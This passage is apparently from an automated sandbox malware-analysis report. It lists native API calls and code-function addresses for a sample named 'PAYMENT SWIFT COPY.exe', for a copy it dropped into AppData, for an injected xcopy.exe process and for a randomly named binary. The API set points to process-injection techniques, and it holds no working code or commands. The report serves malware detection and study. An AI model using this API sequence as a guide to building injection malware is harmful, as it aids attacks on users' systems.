                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912BE0 NtQueryValueKey,8_2_01912BE0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912AB0 NtWaitForSingleObject,8_2_01912AB0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912AD0 NtReadFile,8_2_01912AD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912AF0 NtWriteFile,8_2_01912AF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912DB0 NtEnumerateKey,8_2_01912DB0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912DD0 NtDelayExecution,8_2_01912DD0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912D10 NtMapViewOfSection,8_2_01912D10
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912D00 NtSetInformationFile,8_2_01912D00
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912D30 NtUnmapViewOfSection,8_2_01912D30
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912CA0 NtQueryInformationToken,8_2_01912CA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912CC0 NtQueryVirtualMemory,8_2_01912CC0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912CF0 NtOpenProcess,8_2_01912CF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912C00 NtQueryInformationProcess,8_2_01912C00
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912C60 NtCreateKey,8_2_01912C60
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912F90 NtProtectVirtualMemory,8_2_01912F90
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912FB0 NtResumeThread,8_2_01912FB0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912FA0 NtQuerySection,8_2_01912FA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912FE0 NtCreateFile,8_2_01912FE0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912F30 NtCreateSection,8_2_01912F30
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912F60 NtCreateProcessEx,8_2_01912F60
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912E80 NtReadVirtualMemory,8_2_01912E80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912EA0 NtAdjustPrivilegesToken,8_2_01912EA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912EE0 NtQueueApcThread,8_2_01912EE0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912E30 NtWriteVirtualMemory,8_2_01912E30
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01913090 NtSetValueKey,8_2_01913090
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01913010 NtOpenDirectoryObject,8_2_01913010
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019139B0 NtGetContextThread,8_2_019139B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01913D10 NtOpenProcessToken,8_2_01913D10
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01913D70 NtOpenThread,8_2_01913D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F34340 NtSetContextThread,LdrInitializeThunk,15_2_02F34340
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F34650 NtSuspendThread,LdrInitializeThunk,15_2_02F34650
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32AF0 NtWriteFile,LdrInitializeThunk,15_2_02F32AF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32AD0 NtReadFile,LdrInitializeThunk,15_2_02F32AD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_02F32BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32BE0 NtQueryValueKey,LdrInitializeThunk,15_2_02F32BE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_02F32BA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32B60 NtClose,LdrInitializeThunk,15_2_02F32B60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32EE0 NtQueueApcThread,LdrInitializeThunk,15_2_02F32EE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_02F32E80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32FE0 NtCreateFile,LdrInitializeThunk,15_2_02F32FE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32FB0 NtResumeThread,LdrInitializeThunk,15_2_02F32FB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32F30 NtCreateSection,LdrInitializeThunk,15_2_02F32F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_02F32CA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02F32C70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32C60 NtCreateKey,LdrInitializeThunk,15_2_02F32C60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_02F32DF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32DD0 NtDelayExecution,LdrInitializeThunk,15_2_02F32DD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_02F32D30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32D10 NtMapViewOfSection,LdrInitializeThunk,15_2_02F32D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F335C0 NtCreateMutant,LdrInitializeThunk,15_2_02F335C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F339B0 NtGetContextThread,LdrInitializeThunk,15_2_02F339B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32AB0 NtWaitForSingleObject,15_2_02F32AB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32B80 NtQueryInformationFile,15_2_02F32B80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32EA0 NtAdjustPrivilegesToken,15_2_02F32EA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32E30 NtWriteVirtualMemory,15_2_02F32E30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32FA0 NtQuerySection,15_2_02F32FA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32F90 NtProtectVirtualMemory,15_2_02F32F90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32F60 NtCreateProcessEx,15_2_02F32F60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32CF0 NtOpenProcess,15_2_02F32CF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32CC0 NtQueryVirtualMemory,15_2_02F32CC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32C00 NtQueryInformationProcess,15_2_02F32C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32DB0 NtEnumerateKey,15_2_02F32DB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F32D00 NtSetInformationFile,15_2_02F32D00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F33090 NtSetValueKey,15_2_02F33090
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F33010 NtOpenDirectoryObject,15_2_02F33010
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F33D70 NtOpenThread,15_2_02F33D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_02F33D10 NtOpenProcessToken,15_2_02F33D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_00549470 NtCreateFile,15_2_00549470
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005495E0 NtReadFile,15_2_005495E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005496D0 NtDeleteFile,15_2_005496D0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_00549780 NtClose,15_2_00549780
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_005498F0 NtAllocateVirtualMemory,15_2_005498F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 0_2_010CDA5C0_2_010CDA5C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004187C38_2_004187C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0040E1538_2_0040E153
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004101638_2_00410163
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004169C38_2_004169C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004169BF8_2_004169BF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0040E2978_2_0040E297
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0040E2A38_2_0040E2A3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004023CD8_2_004023CD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004023D08_2_004023D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_004044DA8_2_004044DA
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0040FF438_2_0040FF43
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00402F508_2_00402F50
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0040FF3F8_2_0040FF3F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0042EFA38_2_0042EFA3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A01AA8_2_019A01AA
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019941A28_2_019941A2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019981CC8_2_019981CC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D01008_2_018D0100
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197A1188_2_0197A118
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019681588_2_01968158
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019720008_2_01972000
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A03E68_2_019A03E6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE3F08_2_018EE3F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199A3528_2_0199A352
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019602C08_2_019602C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019802748_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A05918_2_019A0591
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E05358_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198E4F68_2_0198E4F6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019844208_2_01984420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019924468_2_01992446
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DC7C08_2_018DC7C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019047508_2_01904750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E07708_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FC6E08_2_018FC6E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A08_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019AA9A68_2_019AA9A6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F69628_2_018F6962
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C68B88_2_018C68B8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E8F08_2_0190E8F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E28408_2_018E2840
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EA8408_2_018EA840
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01996BD78_2_01996BD7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199AB408_2_0199AB40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DEA808_2_018DEA80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F8DBF8_2_018F8DBF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DADE08_2_018DADE0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197CD1F8_2_0197CD1F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EAD008_2_018EAD00
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980CB58_2_01980CB5
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0CF28_2_018D0CF2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0C008_2_018E0C00
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195EFA08_2_0195EFA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2FC88_2_018D2FC8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01900F308_2_01900F30
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01982F308_2_01982F30
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01922F288_2_01922F28
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01954F408_2_01954F40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199CE938_2_0199CE93
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F2E908_2_018F2E90
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199EEDB8_2_0199EEDB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199EE268_2_0199EE26
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0E598_2_018E0E59
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EB1B08_2_018EB1B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019AB16B8_2_019AB16B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191516C8_2_0191516C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CF1728_2_018CF172
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E70C08_2_018E70C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198F0CC8_2_0198F0CC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019970E98_2_019970E9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199F0E08_2_0199F0E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0192739A8_2_0192739A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199132D8_2_0199132D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CD34C8_2_018CD34C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E52A08_2_018E52A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FB2C08_2_018FB2C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019812ED8_2_019812ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FD2F08_2_018FD2F0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197D5B08_2_0197D5B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A95C38_2_019A95C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019975718_2_01997571
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199F43F8_2_0199F43F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D14608_2_018D1460
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199F7B08_2_0199F7B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019916CC8_2_019916CC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019256308_2_01925630
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019759108_2_01975910
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E99508_2_018E9950
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FB9508_2_018FB950
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E38E08_2_018E38E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194D8008_2_0194D800
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FFB808_2_018FFB80
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01955BF08_2_01955BF0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191DBF98_2_0191DBF9
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199FB768_2_0199FB76
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01925AA08_2_01925AA0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197DAAC8_2_0197DAAC
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01981AA38_2_01981AA3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198DAC68_2_0198DAC6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199FA498_2_0199FA49
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01997A468_2_01997A46
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01953A6C8_2_01953A6C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FFDC08_2_018FFDC0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01991D5A8_2_01991D5A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E3D408_2_018E3D40
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01997D738_2_01997D73
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199FCF28_2_0199FCF2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01959C328_2_01959C32
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E1F928_2_018E1F92
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199FFB18_2_0199FFB1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A3FD28_2_018A3FD2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018A3FD58_2_018A3FD5
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199FF098_2_0199FF09
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E9EB08_2_018E9EB0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 9_2_0103DA5C9_2_0103DA5C
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0153F17213_2_0153F172
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158516C13_2_0158516C
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0154010013_2_01540100
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155B1B013_2_0155B1B0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0153D34C13_2_0153D34C
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015533F313_2_015533F3
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156B2C013_2_0156B2C0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015D02C013_2_015D02C0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156D2F013_2_0156D2F0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015552A013_2_015552A0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155053513_2_01550535
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0154146013_2_01541460
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155349713_2_01553497
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0157475013_2_01574750
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155077013_2_01550770
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155B73013_2_0155B730
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0154C7C013_2_0154C7C0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156C6E013_2_0156C6E0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155995013_2_01559950
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156B95013_2_0156B950
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156696213_2_01566962
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155599013_2_01555990
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015529A013_2_015529A0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155284013_2_01552840
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155A84013_2_0155A840
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015BD80013_2_015BD800
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0157E8F013_2_0157E8F0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015538E013_2_015538E0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158889013_2_01588890
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015368B813_2_015368B8
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0158DBF913_2_0158DBF9
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015C5BF013_2_015C5BF0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156FB8013_2_0156FB80
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015C3A6C13_2_015C3A6C
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0154EA8013_2_0154EA80
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01553D4013_2_01553D40
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155ED7A13_2_0155ED7A
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0155AD0013_2_0155AD00
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01558DC013_2_01558DC0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0156FDC013_2_0156FDC0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_0154ADE013_2_0154ADE0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01568DBF13_2_01568DBF
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01550C0013_2_01550C00
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015C9C3213_2_015C9C32
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01569C2013_2_01569C20
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01540CF213_2_01540CF2
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015C4F4013_2_015C4F40
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01570F3013_2_01570F30
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01592F2813_2_01592F28
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01542FC813_2_01542FC8
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01551F9213_2_01551F92
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_015CEFA013_2_015CEFA0
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01550E5913_2_01550E59
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01562E9013_2_01562E90
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeCode function: 13_2_01559EB013_2_01559EB0
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06877C8B14_2_06877C8B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_06879C9B14_2_06879C9B
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068804FB14_2_068804FB
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exeCode function: 14_2_068804F714_2_068804F7
